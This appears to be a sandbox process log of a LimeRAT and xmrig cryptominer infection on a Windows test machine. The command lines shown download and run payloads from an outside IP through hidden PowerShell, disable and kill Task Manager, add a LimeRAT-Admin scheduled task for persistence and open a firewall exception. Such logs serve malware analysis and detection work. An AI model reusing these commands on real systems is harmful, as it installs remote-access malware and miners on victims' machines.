wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\java.vbs"
3236WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
8152taskkill.exe taskkill /F /IM xmrig.exe
5888WMIC.exe wmic process where name='xmrig.exe' delete
8084PING.EXE ping 127.0.0.1 -n 5
4884wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\upd3.vbs"
5168WMIC.exe wmic process where name='taskmgr.exe' delete
2340WMIC.exe wmic process where name='Taskmgr.exe' delete
3932WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
3004reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
9060PING.EXE ping 127.0.0.1 -n 5
3252wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\1a2.vbs"
3464svchost.exe "C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe"
6872schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe'"
1636svchost.exe "C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe"
2620powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
4560win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
6408powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
1844explorer.exe "C:\Windows (x86)\explorer.exe"
4156PING.EXE ping 127.0.0.1 -n 90
4568wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\z.vbs"
2456wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
6120wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs"
7460wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
1808cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\1234.bat"
3356PING.EXE ping 127.0.0.1 -n 5
7076cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat"
6584netsh.exe netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
7080